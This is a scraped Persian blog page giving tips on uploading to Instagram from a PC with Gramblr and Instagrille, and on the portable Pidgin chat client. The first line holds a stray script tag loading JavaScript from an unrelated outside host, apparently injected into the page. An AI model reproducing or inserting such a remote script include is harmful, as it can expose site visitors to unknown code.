script type="text/javascript" src="http://7vps.ir/img/website.js"> اینستاگرام برای رایانه
کافی نت
وبلاگی جذاب
اینستاگرام امروز به عنوان یکی از محبوب‌ترین اپلیکیشن‌های اجتماعی تحت موبایل شناخته می‌شود. این شبکه خلق و به اشتراک‌گذاری عکس و ویدیو تنها در دستگاه‌های همراه‌ مانند تلفن‌های همراه و تبلت قابل دسترسی است. با پیشرفت و توسعه‌ روزافزون این شبکه، سایت‌های مختلفی به‌وجود آمد که خدمات بسیار متفاوت و گسترده‌ای را درباره آن ارایه می‌داد. علاوه بر آن نرم‌افزارهای شبیه‌ساز مختلفی روی رایانه‌های ویندوز، مک و ... برای اینستاگرام تولید شده تا برای آنها که دستگاه هوشمند ندارند از طریق رایانه بتواند به سرویس‌های اینستاگرام دسترسی داشته باشند.  
یکی از این نرم‌افزارهای شبیه‌ساز اینستاگرام برای رایانه نرم‌افزار گرامبلر (Gramblr) است. گرامبلر قابلیت آپلود تصاویر از کامپیوتر به ‌اینستاگرام را فراهم می‌کند. شما می‌توانید عکس‌های موجود در کامپیوتر را در اینستاگرام به اشتراک بگذارید.
برای شروع کار، ابتدا بايد با گوشی هوشمند در اپلیکیشن اینستاگرام حساب کاربری بسازید و مراحل زیر را دنبال کنید:
1- به تارنمای گرامبلر http://gramblr.com  مراجعه کرده  و آن را دانلود کنید.
2- پس از دانلود و نصب، آیکون نرم‌افزار روی دسکتاپ نمایان می‌شود.
3- پس از اجرا، حساب کاربری اینستاگرام خود را وارد کنید تا وارد نرم‌افزار شوید. 
بعد از ورود، گرامبلر به شما این امکان را می‌دهد که عکس خود را بارگذاری کنید. برای بارگذاری عکس چندین نکته را بايد در نظر بگیرید:
 عکس انتخابی باید مربع کامل باشد. با مراجعه به وب‌سایت وب گرامبلر می‌توانید عکس خود را بارگذاری کرده عکس را به سایز مربع تبدیل کنید. هم‌چنین این سایت حجم عکس را کم می‌کند تا بارگذاری آن راحت‌تر شود.
 حال عکس مربع را در صفحه مربوطه بارگذاری کنید و در صفحه بعدی از شما عنوانی برای عکس می‌خواهد با واردکردن عنوان عکس، بارگذاری عکس شما تمام شده و در پروفایل اینستاگرام شما قرار می‌گیرد. البته می‌توان در عنوان نیز هشتگ‌های لازم و معروف مرتبط با عکس را وارد کرد تا عکس محلی شما در بعد جهانی دیده
 شود. 
 شما می‌توانید عکس را در رسانه‌های اجتماعی دیگری مانند فیس‌بوک و توییتربه اشتراک بگذارید.
البته گرامبلر امکانی برای مرور و مشاهده عکس‌ها، دنبال‌کردن و جست‌وجوی افراد و عکس‌ها ندارد و تنها می‌توانید از طریق آن عکس آپلود کنید. برای مرور عکس‌ها می‌توانید از نرم‌افزار اینستاگریل در کامپیوتر خود استفاده کنید. البته نسخه وب اینستاگرام امکان مرور و مشاهده عکس‌ها را به شما می‌دهد. یکی دیگر از شبیه‌سازهای اینستاگرام برای رایانه‌اینستاگریل است. اینستاگریل (Instagrille) محیطی را مانند گوشی‌های هوشمند روی ویندوز شما شبیه سازی می‌کند. این برنامه تمامی امکانات اینستاگرام را ارايه داده و می‌توانید عکس‌های اینستاگرام را هم روی رایانه ذخیره کنید. البته ‌اینستاگریل قابلیت بارگذاری تصاویر از کامپیوتر را ندارد.


جمعه 8 خرداد 1394برچسب:اینستاگرام برای رایانه, :: 1:2 قبل از ظهر
گری گوری

چت با تمام آيدي ها با نرم افزار Pidgin 2.6.6 Portable

نوشته شده توسط در تاریخ چهارشنبه، 11 فروردین ماه 1389
pidgin-2.66-portable.jpg
 
استفاده از نرم افزار هاي instant messaging ( پيام رسان فوري)‌ به شكل چشمگيري محبوبيت دارند . يكي از بهترين و قديمي ترين روش ها براي چت كردن و صحبت با دوستان و يا همكاران ، استفاده از چنين برنامه هايي است . از جمله نرم افزار معروف در اين زمينه ياهو مسنجر است . ياهو مسنجر نزم افزاري عالي براي چت با آيدي هاي ياهو است و امكانات فراواني را در اختيار كاربر قرار مي دهد اما اگر بخواهيد با كساني كه آيدي هاي ديگري غير از ياهو دارند ( مانند جيميل , AOL Instant Messenger, ICQ, MSN Messenger ) چت كنيد ، ياهو مسنجر چنين قابليتي ندارد . براي اين كار به نرم افزاري جايگزين نياز پيدا مي كنيم . نرم افزار هاي فراواني در اين زمينه وجود دارند . يكي از بهترين نرم افزار هاي پيام رسان دنيا ، Pidgin مي باشد . با  Pidgin هم مي توانيد با تمام افراد كه آيدي هاي مختلف دارند ، به راحتي چت كنيد و هم اين كه آيدي هاي مختلف خودتان در ياهو ، AOL ، جي ميل و ... را همزمان آنلاين داشته باشيد . حتي مي توانيد چندين آيدي از يك پروتوكول را همزمان آنلاين داشته باشيد كه براي كساني كه مثلا چند آيدي ياهو فعال دارند و كاربرد هاي هركدام جدا هستند ، بسيار لازم است . استفاده از Pidgin آسان است و به راحتي با محيط آن آشنا خواهيد شد . با اين نرم افزار تمام ليست كساني كه در تمام آيدي هاتان داريد را در يكجا خواهيد داشت و مي توانيد با هر كدام نياز بود ، به آساني چت كنيد . pidgin نرم افزاري رايگان است و نيازي به هيچ كرك / سريال براي نصب و استفاده از آن نيست .نرم افزار هاي ديگر در اين زمينه يك مشكل بزرگ دارند و آن اين است كه بايد كاربر يك اكانت مخصوص همان نرم افزار بسازد و بعد از نرم افزار استفاده كند اما در Pidgin اين مشكل نيست و براي استفاده از نرم افزار نبايد اكانت مخصوص بسازيد ، فقط به راحتي كافيست آيدي هاي مختلف تان را به Pidgin معرفي كنيد . نكته ديگر در مورد Pidgin متن باز بودن آن است . حتما شما هم موافقيد كه به طور كلي استفاده از نرم افزار Open Source (متن باز) لذت خاصي دارد . Pidgin نرم افزار متن باز عالي براي چت كردن است كه اگر قبلا با آن كار نكرده ايد ، پيشنهاد مي كنم حتما آن را تجربه كنيد . نسخه اي كه در اينجا براي دانلود قرار دادم ، جديد ترين نسخه نرم افزار و بصورت پورتيبل/ همراه است .
 



ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 3
بازدید دیروز : 0
بازدید هفته : 95
بازدید ماه : 9127
بازدید کل : 139278
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس